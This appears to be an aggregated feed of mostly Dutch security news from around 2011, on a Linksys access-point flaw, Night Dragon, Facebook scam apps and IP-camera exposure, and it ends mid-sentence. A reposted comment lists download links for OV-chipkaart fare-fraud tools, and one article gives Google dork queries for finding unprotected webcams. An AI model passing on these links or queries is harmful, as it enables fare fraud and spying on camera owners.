  • Linksys WAP610NEr zit een ernstig beveiligingslek in het Linksys WAP610N WiFi Access Point, waardoor aanvallers willekeurige code kunnen uitvoeren en het apparaat kunnen overnemen. Het probleem is al maanden bij Linksys bekend, maar een patch is nog altijd niet verschenen. Via de kwetsbaarheid kan een aanvaller zonder authenticatie met een console op het access point verbinding maken, zonder dat hiervoor authenticatie is vereist, om vervolgens systeemopdrachten uit te voeren. Het enige wat een aanvaller hiervoor nodig heeft is een telnet client.

    Beveiligingsonderzoekers van Secure Network waarschuwden Linksys, onderdeel van Cisco, op 14 juni van vorig jaar. Op dezelfde dag bevestigde Linksys het probleem, maar daarna bleef het stil. Zes maanden later gaf de netwerkleverancier antwoord op een e-mail van de onderzoekers, waarin ze om een update vroegen. Aangezien er inmiddels acht maanden zonder update zijn verstreken, besloten ze tot full-disclosure over te gaan.

    Als oplossing adviseert Secure Network om access points op een apart draadloos netwerk te zetten en al het netwerkverkeer van en naar TCP poort 1111 te filteren.

    Bron: security.nl

  •  

    Volgens beveiligingsbedrijf McAfee hebben Chinese hackers toegang gekregen tot systemen van oliebedrijven. Zeker tien bedrijven zouden zijn getroffen. De hackers gebruikten servers in Nederland om de aanvallen uit te voeren.

    De hackers gebruikten onder andere beveiligingslekken in Windows, sql injection en phishing om toegang te krijgen tot geheime documenten. Gigabytes aan documenten over olievelden, financieringen en proposities zouden zijn buitgemaakt. Volgens McAfee gebruikten de hackers gekaapte servers in Nederland om hun aanvallen uit te voeren, naast in de Verenigde Staten gehuurde servers.

    De waarschijnlijk uit China afkomstige aanvallen, door McAfee onder de noemer Night Dragon geschaard, zouden sinds november 2009 voorkomen en een tiental bedrijven hebben getroffen. McAfee wil niet aangeven om welke bedrijven het gaat. De hackers zouden niet hebben geprobeerd om systemen te saboteren, maar alleen op informatie uit zijn geweest.

    Volgens McAfee waren de aanvallen weinig complex, maar desondanks succesvol. De buitgemaakte informatie zou 'zeer gevoelig' zijn en kan bedrijven veel geld kosten, denkt het beveiligingsbedrijf. Eerder leden Iraanse kerncentrales onder aanvallen van hackers, waarbij wel werd gesaboteerd: de Stuxnet-worm zou de frequentieregelaars in de kerncentrales hebben ontregeld. Volgens sommigen zitten de Amerikaanse en Israëlische overheden achter het virus.

    nightdragon

    Bron: tweakers.net
  • EFacebook-logor is een toolkit online verschenen waarmee iedereen kwaadaardige Facebook applicaties kan maken. De "Tinie app" kost een kleine twintig euro en bestaat uit een stap-voor-stap handleiding die gebruikers precies vertelt wat ze moeten doen. De gebruiker heeft geen enkele ervaring met het ontwikkelen van Facebook apps te hebben. Het volgen van de instructies volstaat om een eigen virale Facebook applicatie te ontwikkelen. De Tinie app zou ook gebruikt zijn voor het ontwikkelen van de "Profile Creeps" en "Creeper Tracker" apps, die het vorige week op Facebook-gebruikers hadden voorzien.

    De "maker" van de app verdient uiteindelijk weer geld als Facebook-gebruikers die installeren en een online enquête volgen. Voor Facebook-gebruikers die zich tegen URLs en spam op hun profiel willen beschermen is er de gratis Defensio app, aldus beveiligingsbedrijf Websense.

    bron: security.nl

  • De nieuwe manier van adverteren op Facebook wordt bekritiseerd door privacyvoorvechters.

    De nieuwe manier van adverteren op Facebook wordt bekritiseerd door privacyvoorvechters. Bedrijven kunnen sinds kort advertenties uit naam van gebruikers plaatsen die een product met "vind ik leuk" hebben gemarkeerd. Vrienden van deze gebruikers kunnen vervolgens een reclame verwachten in hun scherm, waar deze gebruiker het product aanprijst.

    Deze 'Sponsored Stories' vallen bij veel internetjuristen in het verkeerde keelgat. Zo ook bij Kevin Bankston, senior advocaat van de Electronic Frontier Foundation. Hij zegt dat Facebook hiermee niet de privacy schaadt van gebruikers, maar wel misbruik maakt van hun vertrouwen. "Er moet een opt-out functie bij komen" aldus Bankston. Andere privacyexperts zeggen dat deze functie niet zoveel om handen heeft wat betreft privacy als eerdere functies, zoals de incheck-applicatie Facebook Places, die laat zien waar gebruikers zich op dat moment bevinden.

    Facebook laat via woordvoerder Brandon McCormick weten dat het gebruik van profielen in combinatie met reclame juist gemakkelijker is. "We pakken op wat er gebeurt in je nieuwsfeed en geven dit opnieuw uit, zodat het makkelijker is voor jouw vrienden om te zien. Het is een andere manier voor vrienden om vrienden te laten zien wat zij aanraden." McCormick legt wel nadruk op het feit dat de "Sponsored Story" dezelfde privacyinstellingen krijgt als de originele inhoud en alleen wordt gebruikt binnen een specifieke groep vrienden.

    Bron: security.nl

  • Er is een nieuwe applicatie in omloop die OV-chipkaarten binnen een minuut kan aanpassen.

    Door Anoniem:Ja, ik zoek ook de download link *en een goedkope ov chipkaart card reader/writer (NERGENS MEER NORMAAL TE KRIJGEN

    Nou, vooruit, voor al diegenen die blijkbaar niet weten waar ze het zoeken moeten:

    N.B: Lees altijd eerst de mee verzonden ReadMe!!!

    - 0 -Installeer een BitTorrent-client/server naar keuze: http://nl.wikipedia.org/wiki/Bittorrent
    - 1 -http://thepiratebay.org/torrent/6128466/OVSaldo_software_for_adding_credit_to_your_OV-chipkaart
    - 2 -http://www.tsl.utwente.nl/projects/OV%20MFOC%20Port.zip
    - 3 -http://www.nooitstipt.nl/nooit-stipt/2011/01/gratis-met-de-trein/
    - 4 -<== 32 bit ==> http://www.microsoft.com/downloads/en/details.aspx?familyid=A7B7A05E-6DE6-4D3A-A423-37BF0912DB84&displaylang=en
    - 4 -<== 64 bit ==> http://www.microsoft.com/downloads/en/details.aspx?familyid=BD512D9E-43C8-4655-81BF-9350143D5867&displaylang=en
    - 5 -http://libnfc.googlecode.com/files/libnfc-1.3.9.msi

    Voor deze speciale gelegenheid heb ik vorige week zaterdag tot & met woensdag j.l. een van mijn computers geinstalleerd als BT-client, & in die tijd is OV-Saldo.rar meer dan 1000 keer vanaf die computer gedownload (!).

    Heb ook nog drie Card-Readers in de aanbieding, iets sjieker merk & model dan waar momenteel woekerprijzen voor worden gevraagd. :-) Roept U maar!!!

    Blij dat ik fiets... ;-)

    P.S: Waarom is het zo stil over dit onderwerp in zowel het Mac- alswel het Linux-rijk? Ach, het Mac-rijk begrijp ik nog wel, duur spul, voor niks gaat de zon op, niets is gratis.

    Maar het Linux-rijk, de voorstanders van alles open, vrij & gratis? Niets...
    Ok, Linux is dan ook eigenlijk niet gratis, & nooit geweest, want de clienten worden nog steeds betaald door de servers...

    Couldn't resist... ;-)

    Bron: security.nl

  • Meer consumenten moeten WPA2 als beveiliging voor hun draadloos netwerk instellen, zo pleit de Wi-Fi Alliance.

    Meer consumenten moeten WPA2 als beveiliging voor hun draadloos netwerk instellen, zo pleit de Wi-Fi Alliance. Uit onderzoek van de non-profit organisatie blijkt dat het meeliften op andermans WiFi-netwerken regelmatig voorkomt. 32% van de ondervraagden heeft weleens geprobeerd mee te liften op een netwerk dat niet van henzelf was. Bijna een verdubbeling ten opzichte van 2008.

    "Een geschatte 201 miljoen huishoudens gebruiken WiFi-netwerken en wereldwijd zijn er 750.000 hotspots beschikbaar, meer persoonlijke wordt over deze netwerken verstuurd, waardoor WiFi-beveiliging van essentieel belang is", aldus de organisatie. Die ontdekte verder dat 40% eerder de huissleutel aan een iemand toevertrouwt dan het WiFi-wachtwoord. Volgens een kwart van de respondenten voelt een WiFi-wachtwoord persoonlijker dan het delen van een tandenborstel.

    Hotspots
    "De meeste consumenten weten dat het open laten van hun WiFi-netwerk niet verstandig is, maar in werkelijkheid nemen velen geen maatregelen om zichzelf te beschermen", zegt marketingdirecteur Davis-Felner. Naast het instellen van WPA2 doen consumenten er verstandig aan om geen vertrouwelijke informatie via publieke hotspots te versturen en het automatisch verbinding maken uit te schakelen.

    Bron: security.nl

  • Sony heeft een nieuwe firmware voor de PlayStation 3 uitgebracht waarin een rootkit zit verstopt, zo beweert ontwikkelaar Mathieulh.

    denk even na, dit is helemaal niet bedoelt om mensen hun rechten af te nemen. het is illegaal om homebrew software gratis op internet aan te bieden. U mag dit alleen voor u zelf doen (het zelfde als films downloaden voor persoonlijk gebruik)

    als mensen homebrews online beginnen aan te bieden heeft Sony het recht om consoles met die software te bannen van Playstation network, de nieuwste firmware automatisch te laten downloaden en installeren en om playstation accounts van betreffende console te verbannen.

    Sony heeft dit recht, en hoewel ik de hackers van dit soort dingen haat vind ik het ook wat ver gaan, maar het is allemaal binnen de wet. Verder is die mathieuj gewoon een middelmatig blog schrijvertje op een jailbreak website, lijkt me duidelijk..

    Bron: security.nl

  • Microsoft waarschuwt Windows-gebruikers voor een nieuw beveiligingslek waardoor aanvallers vertrouwelijke informatie kunnen stelen.

    Microsoft waarschuwt Windows-gebruikers voor een nieuw beveiligingslek waardoor aanvallers vertrouwelijke informatie kunnen stelen. De kwetsbaarheid is in alle ondersteunde Windows-versies aanwezig en wordt veroorzaakt door een fout in de MHTML (MIME Encapsulation of Aggregate HTML) protocol handler. Deze handler wordt door applicaties gebruikt om verschillende soorten documenten te renderen.

    De gevolgen van het lek zijn gelijk aan dat van server-side cross-site-scripting (XSS). Een aanvaller zou een HTML-link kunnen maken die een kwaadaardig script aanroept. Als het slachtoffer de link opent, draait het kwaadaardige script op zijn computer en tijdens de rest van de browsersessie. Het script zou gebruikersgegevens kunnen stelen, zoals e-mail, of weergegeven content in de browser kunnen manipuleren

    Oplossing
    De exploit voor de kwetsbaarheid is al online verschenen, maar volgens Microsoft wordt het lek niet actief in het wild misbruikt. Als oplossing krijgen gebruikers het advies om het MHTML protocol af te schermen. Ook is er een Fix-it oplossing die dit via één muisklik regelt. Het nadeel van deze tijdelijke oplossing is dat ActiveX of Active Scripting niet meer werken.

    Microsoft benadrukt dat Internet Explorer een aanvalsvector is, maar dat het lek in Windows aanwezig is. "De versie van IE doet niet ter zake", zegt Dave Ross van Microsofts Security Research & Defense.

    Bron: security.nl

  • Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems are hardened enough for specific attacks. Mausezahn can be used for example: As traffic [...]

    Read the full post at darknet.org.uk

    image
    image

  • Via nieuwe software is het mogelijk om thuis met gekraakte OV-chipkaarten in te checken, zonder dat het misbruik in de centrale systemen wordt gedetecteerd.

    Via nieuwe software is het mogelijk om thuis met gekraakte OV-chipkaarten in te checken, zonder dat het misbruik in de centrale systemen wordt gedetecteerd. Daarover bericht Webwereld, dat met hulp van hackers 'atdt112' en 'LogicAnalyz3r' software in handen kreeg om zelf de check-in te regelen. Daardoor is er geen registratie meer bij een poortje nodig en wordt de fraude niet opgemerkt.

    Gebruikers kunnen via hun pc aangeven op welk station men wil 'inchecken', gevolgd door datum en tijd voor de treinreis. Die informatie wordt op de kaart gezet en bij een controle aan de conducteur getoond. Aangezien paal of poortje worden omzeild, mist Translink Systems de informatie om fraude te kunnen detecteren. Ook hoeft er geen saldo aanwezig te zijn, omdat voor deze vorm van reizen met de OV-chipkaart geen administratie meer wordt gevoerd.

    De incheck-tools bestaan op het moment alleen voor Windows en zouden zeer gebruiksvriendelijk zijn. Financieel directeur van TLS liet gisteren in Nieuwsuur nog weten dat frauderen met de OV-chipkaart niet mag. "Het is verboden dus waarom zou iemand dat doen?"

    Wij willen u niet stimuleren gebruik te maken van de mogelijkheid uw OVchipkaart te manipuleren, echter wij maken u er op attent hoe eenvoudig het is om met uw Ovchipkaart gratis te kunnen reizen. Wij zijn niet verantwoordelijk voor de software nog voor enige schade opgelopen door het gebruik hiervan", aldus de makers.

    Bron: security.nl

  • Mantra is a dream that came true. It is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software. Mantra is a [...]

    Read the full post at darknet.org.uk

    image
    image

  • Google is considered to be a powerful search engine that helps millions of users to find fast & easy useful webpages. Nevertheless Google Search can also be a handy toolin the hands of malicious users, spammers & hackers.

     In this article we will describe few tricks that can be used in Google Search in order to easily find and access pages that normally should be protected. At the end of the article we will discuss how webmasters can protect their sites from such attacks.

    Important Notice: The purpose of this article is to inform webmasters about the risks they face and help them secure their websites. If you use this article’s content for anything other than educational purposes, the author of this site is not responsible for your actions or anything as a result of your actions.

    How to Access Member Only Areas

    Lots of forums allow access in some or all of their threads only to their members. Others do not disclose to unregistered users important parts of the page such as links and images.

    Nevertheless, in some cases the webmasters of those forums allow Google to index the secured pages in order to appear in the search results and increase their SE traffic.

    by Google you can overcome this limitation by using the “cache:” operator. What you need to do is search on Google for the following term cache:Locked_URL. Example: cache:http://www.example.com/some_locked_thread.php?id=2323

    If the cache operator is not available try searching for the URL address. If it is a non HTML file you can also try the View as HTML or the Quick View Google features.

    How to Access and Download restricted files

    There are cases where PDF, DOC or similar files are accessible only to members and paid users. Nevertheless it is very easy to overcome this limitation if you are aware of a small sentence of the document and by finding an unprotected version of the file elsewhere.

    Try searching for this small sentence on Google by including it in double quotes. Example: “and as a result the SEO is the”

    The less important this sentence is, the more targeted the results will be and thus the better for you. Generally you should avoid searching for Titles because they are used more often as a reference by irrelevant pages.

    In case that you know only the title of the document you can search for it by using the intitle and the filetype operators. Example:

    intitle:”The PageRank Citation Ranking” filetype:pdf

    If you don’t find right away the unprotected version then you can use the text that appears in the snippets as a small sentence. If the sentence is not long enough try guessing keywords and phrases that appear in the text in order to get a more descriptive snippet.

    How to Access Unprotected Internet webcams

    If a webcam is not configured properly it can be accessed via web by everyone without using username and password. The worst case scenario is not only to have it unprotected but also to be indexed in Google. If this is the case, by using particular search queries you can find those pages and spy on their owners. Here are some example queries:

    intitle:”Live View / – AXIS” | inurl:view/view.shtml^

    inurl:/view.shtml

    If you are interested there is a great article called “Hack to Search and View Free Live Webcam with Google Search” where you can read more about this topic.

    How to protect your website and your privacy

    There is a very basic and easy to remember rule that can help you protect your website and your privacy from such attacks. Make sure you block from Google all the content that should not be indexed. Also make sure you restrict the pages by using username and password. This can be done easily by using your .htaccess file or by protecting the member area with a PHP or a similar script.

    Make sure you restrict the access and the direct downloads of sensitive files. My suggestion is to store them in a folder that is not accessed via web or in a DB and then by using a PHP or other script decide whether you are going to allow access to the file or not.

    Some basic security tips:

    • Ensure that you secure the webcams by making authentication required.
    • Don’t place on the web sensitive information.
    • Use strong passwords and change them regularly.
    • Remember to update your servers and patch your software regularly.

    Source: webseoanalytics.com

  • IP-CAMIn de laatste paar decennia zijn we zo gewend geraakt aan het idee dat alles wordt bekeken en opgenomen - in winkels, op straat, etc.  - We hebben vaak niet eens meer door dat er camera's hangen.

    Het is goed om bewust te zijn van de gevolgen vanonbeveiligde bewakingssystemen.
    Vroeger was het zo dat de bewakingssystemen bestond uit analoge camera's, die fysiek waren aangesloten op een centraal registratiesysteem. Door de komst van de ip-camera's maakt dit veel goedkoper en minder tijdrovend!

     Dus, als een goedkoper en gemakkelijker alternatief voor hun analoge tegenhangers, zijn de IP-camera's is het winnen van marktaandeel in een snel tempo en zal waarschijnlijk blijven doen in de toekomst.

    Maar het belangrijkste probleem dat nog moet worden aangepakt is die van veiligheid. Analoge bewakingssystemen waren moeilijk te hacken door mensen die niet over de voldoende kennis/middelen beschikt. In tegenstelling tot IP-camera's die  heel gemakkelijk in real-time bekeken in real-time door iedereen (met een minimum aan computerkennis) kan worden bekeken.

    Camera namen en modelnummers gepaard met specifieke zoekopdrachten zoals "intitle", "inurl", "intext," etc, leveren intressante links naar Ip-camera pagina's op. Zoek combinaties zoals "intext: 'MOBOTIX M10' intext: 'Open Menu" en "intitle:" Live View / - 206m AXIS " zijn effectief gebleken.

    Er zijn hele online gemeenschappen van mensen die geïnteresseerd zijn in het vinden van onbeveiligde IP-camera's en bij het bespreken van hun belang op forums. Ze zijn ook bekend om grote lijsten van zoekstrings bieden dat het werk op Google Search en ze zijn er voor het oprapen voor al die mensen die niet weten waar te be